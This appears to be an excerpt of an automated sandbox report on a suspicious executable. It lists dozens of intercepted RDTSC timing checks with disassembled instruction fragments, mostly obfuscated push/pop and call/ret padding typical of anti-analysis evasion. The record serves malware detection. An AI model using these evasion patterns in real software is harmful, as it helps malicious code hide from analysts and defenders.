Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BE9F second address: B5BEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BEA5 second address: B5BEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BB80 second address: B5BB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BB86 second address: B5BB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BB8A second address: B5BB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F10E0E4A428h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5C95A second address: B5C964 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10E0B669CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5C6B3 second address: B5C6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5D42E second address: B5D432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5D432 second address: B5D445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5EF93 second address: B5EFC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D6h 0x00000007 pushad 0x00000008 jnp 00007F10E0B669C6h 0x0000000e jnc 00007F10E0B669C6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jp 00007F10E0B669C6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5EFC6 second address: B5EFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5EFCC second address: B5EFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F10E0B669C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5EFD7 second address: B5EFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10E0E4A426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5F616 second address: B5F61A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5F6D4 second address: B5F6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61150 second address: B61160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 js 00007F10E0B669C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61160 second address: B61179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A433h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62A0A second address: B62A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62A1B second address: B62A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10E0E4A437h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62A38 second address: B62A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D5h 0x00000007 jno 00007F10E0B669D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F10E0B669CCh 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63A0A second address: B63A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63A20 second address: B63A2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63F8F second address: B63F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63F93 second address: B63FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F10E0B669C8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10E0B669D1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63FB6 second address: B63FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F10E0E4A426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63FC0 second address: B64049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F10E0B669C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 add bx, 125Ah 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F10E0B669C8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov bl, F9h 0x00000049 push 00000000h 0x0000004b add dword ptr [ebp+12457BC4h], ecx 0x00000051 push eax 0x00000052 mov dword ptr [ebp+12457CD0h], ecx 0x00000058 pop edi 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F10E0B669CEh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B64049 second address: B6406F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F10E0E4A42Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6406F second address: B64075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65F99 second address: B65FB3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F10E0E4A42Ch 0x00000008 jno 00007F10E0E4A426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F10E0E4A426h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6523C second address: B65246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66F56 second address: B66F7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A432h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66F7E second address: B66F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F10E0B669C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66F89 second address: B66FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F10E0E4A428h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jnc 00007F10E0E4A42Fh 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+12478F34h], edx 0x00000032 mov dword ptr [ebp+122D2BA6h], esi 0x00000038 xchg eax, esi 0x00000039 jmp 00007F10E0E4A437h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jl 00007F10E0E4A433h 0x00000047 jmp 00007F10E0E4A42Dh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B661A5 second address: B661C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F10E0B669CEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F1E second address: B67F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F22 second address: B67F48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F10E0B669D4h 0x0000000e pushad 0x0000000f jns 00007F10E0B669C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B690E6 second address: B6914A instructions: 0x00000000 rdtsc 0x00000002 je 00007F10E0E4A42Ch 0x00000008 jne 00007F10E0E4A426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F10E0E4A428h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d adc bx, 7EBFh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F10E0E4A428h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e push 00000000h 0x00000050 mov bx, C7FBh 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6914A second address: B69151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68122 second address: B6812C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F10E0E4A426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6812C second address: B68130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B692CF second address: B692D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A387 second address: B6A38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C20D second address: B6C289 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jo 00007F10E0E4A434h 0x00000010 jmp 00007F10E0E4A42Eh 0x00000015 pop ecx 0x00000016 nop 0x00000017 mov ebx, 36DF284Dh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F10E0E4A428h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F10E0E4A428h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov di, si 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jc 00007F10E0E4A428h 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B2C8 second address: B6B2CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C289 second address: B6C298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10E0E4A42Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C298 second address: B6C2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F10E0B669CAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6D2A5 second address: B6D2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E2C6 second address: B6E2D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E2D4 second address: B6E2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E2DA second address: B6E355 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F10E0B669C8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D37D4h] 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D1CBDh] 0x0000003a and ebx, dword ptr [ebp+122D377Ch] 0x00000040 push 00000000h 0x00000042 mov ebx, 1370599Dh 0x00000047 mov dword ptr [ebp+124925D8h], eax 0x0000004d xchg eax, esi 0x0000004e jns 00007F10E0B669D8h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jbe 00007F10E0B669CCh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6D48D second address: B6D531 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10E0E4A439h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 nop 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F10E0E4A428h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov bl, B6h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F10E0E4A428h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+1247995Dh] 0x0000005c mov eax, dword ptr [ebp+122D0AC5h] 0x00000062 mov ebx, dword ptr [ebp+12453CBFh] 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+1245275Dh], edx 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F10E0E4A431h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6D531 second address: B6D53B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10E0B669C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B703A3 second address: B703A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C40B second address: B6C40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B703A9 second address: B703C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0E4A438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6D53B second address: B6D562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C40F second address: B6C413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6C413 second address: B6C431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10E0B669D5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B713F2 second address: B713F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7059D second address: B705A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7069E second address: B706A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7154A second address: B7155E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B726B2 second address: B726B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B726B6 second address: B726C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736A2 second address: B736AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736AC second address: B736B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79223 second address: B79230 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79D73 second address: B79D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA88 second address: B7DA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007F10E0E4A426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DBB0 second address: B7DBE2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10E0B669D7h 0x00000008 jmp 00007F10E0B669D1h 0x0000000d je 00007F10E0B669CEh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F10E0B669C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DBE2 second address: B7DBEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82159 second address: B82162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82162 second address: B82166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82166 second address: B8216A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8220C second address: B82216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82216 second address: B82226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82226 second address: B82257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F10E0E4A42Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F10E0E4A426h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B87E54 second address: B87E60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F10E0B669C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B87E60 second address: B87E8A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F10E0E4A42Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10E0E4A437h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B87E8A second address: B87EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F10E0B669D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B87EAE second address: B87EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B87EB2 second address: B87EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88116 second address: B8811B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B883DA second address: B883DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
